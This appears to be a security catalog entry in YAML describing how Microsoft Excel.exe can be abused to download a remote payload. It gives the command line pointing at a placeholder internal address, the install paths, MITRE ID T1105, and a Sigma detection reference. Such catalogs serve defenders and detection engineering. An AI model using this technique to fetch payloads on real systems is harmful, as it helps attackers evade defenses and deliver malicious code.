--- Name: Excel.exe Description: Microsoft Office binary Author: 'Reegun J (OCBC Bank)' Created: 2019-07-19 Commands: - Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in the cache folder Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows Full_Path: - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe - Path: C:\Program Files (x86)\Microsoft Office\Office16\Excel.exe - Path: C:\Program Files\Microsoft Office\Office16\Excel.exe - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Excel.exe - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Excel.exe - Path: C:\Program Files (x86)\Microsoft Office\Office15\Excel.exe - Path: C:\Program Files\Microsoft Office\Office15\Excel.exe - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Excel.exe - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Excel.exe - Path: C:\Program Files (x86)\Microsoft Office\Office14\Excel.exe - Path: C:\Program Files\Microsoft Office\Office14\Excel.exe - Path: C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe - Path: C:\Program Files\Microsoft Office\Office12\Excel.exe - Path: C:\Program Files\Microsoft Office\Office12\Excel.exe Code_Sample: - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_msoffice.yml - IOC: Suspicious Office application Internet/network traffic Resources: - Link: https://twitter.com/reegun21/status/1150032506504151040 - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 Acknowledgement: - Person: 'Reegun J (OCBC Bank)' Handle: '@reegun21' ---